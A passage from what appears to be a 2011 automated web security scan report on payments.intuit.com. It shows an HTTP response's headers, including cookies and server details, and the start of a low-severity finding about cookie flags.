HTTP/1.1 301 Moved Permanently
Date: Mon, 21 Mar 2011 16:53:16 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N7D6qQirtSQ48MwkE5D6gA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:30:17 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D955B4E80A0805192AA117E3B31762B5
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=ach_jsp&servletResponseTime=1&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: /products/echecks-and-check-processing.jsp
Connection: close
Content-Length: 15
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1


   

2.21. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The following cookies were issued by the application and is